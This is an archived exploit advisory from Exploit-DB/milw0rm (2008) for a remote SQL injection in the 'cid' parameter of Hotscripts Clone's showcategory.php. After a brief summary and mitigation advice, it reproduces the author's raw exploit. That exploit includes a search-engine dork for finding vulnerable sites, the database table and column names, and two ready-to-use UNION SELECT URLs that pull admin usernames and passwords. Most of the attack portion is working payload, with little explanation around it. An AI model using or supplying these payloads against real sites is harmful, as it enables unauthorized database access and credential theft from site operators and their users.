Hotscripts Clone (cid) Remote SQL Injection Vulnerability

vendor:

Hotscripts Clone

by:

Hussin X

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Hotscripts Clone

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Hotscripts Clone (cid) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Hotscripts Clone, which allows an attacker to execute arbitrary SQL commands via the 'cid' parameter in the 'showcategory.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can result in the disclosure of sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Hotscripts Clone (cid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.greatclone.com/product_info.php?cPath=31&products_id=81
|
| DorK   : inurl:add_soft.php
|___________________________________________________|


sbwmd_config:username_len
sbwmd_email_id:useremail
sbwmd_mailing_list:username
sbwmd_mailing_list:useremail
sbwmd_members:username
sbwmd_admin:pwd>freemagics
sbwmd_config:pwd_len
sbwmd_members:pwd
sbwmd_admin:admin_name
sbwmd_config:admin_email
sbwmd_softwares:admin_desc





www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5,6+FROM+sbwmd_admin--


OR


www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5+FROM+sbwmd_admin--






____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________


                             Im IRAQi

# milw0rm.com [2008-09-24]